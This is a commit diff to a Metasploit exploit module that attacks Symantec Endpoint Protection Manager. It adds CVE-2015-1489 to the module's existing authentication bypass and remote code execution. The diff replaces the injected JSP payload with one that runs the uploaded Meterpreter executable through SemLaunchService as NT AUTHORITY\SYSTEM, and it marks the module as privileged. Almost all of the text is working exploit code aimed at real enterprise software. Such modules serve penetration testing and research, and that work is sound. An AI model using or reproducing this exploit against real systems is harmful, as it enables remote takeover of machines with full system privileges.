exploit cve 2015-1489 to get SYSTEM

modules/exploits/windows/http/sepm_auth_bypass_rce.rb

@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
       'Description'    => %q{
-      This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager
-      in order to achieve a remote shell on the box.
+      This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+      in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['CVE', '2015-1486'],
           ['CVE', '2015-1487'],
+          ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
@@ -41,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           } ],
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DisclosureDate' => 'Jul 31 2015',
       'DefaultTarget'  => 0))
 
@@ -73,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
+<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
+    }
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),